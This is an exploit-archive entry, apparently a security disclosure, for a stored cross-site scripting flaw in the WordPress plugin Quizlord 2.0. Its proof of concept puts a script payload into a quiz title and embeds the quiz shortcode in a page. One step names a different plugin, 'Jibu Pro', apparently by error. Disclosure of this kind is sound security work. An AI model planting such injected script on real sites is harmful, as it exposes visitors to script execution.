Exploits / Vulnerability Discovered : 2018-08-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin quizlord 2.0 crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.
# PoC - Stored XSS - Parameter: title
# 1) Login as a user who have access to Jibu Pro plugin.
# 2) Quizlord --> Add a Quiz.
# 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
# (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
# 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser.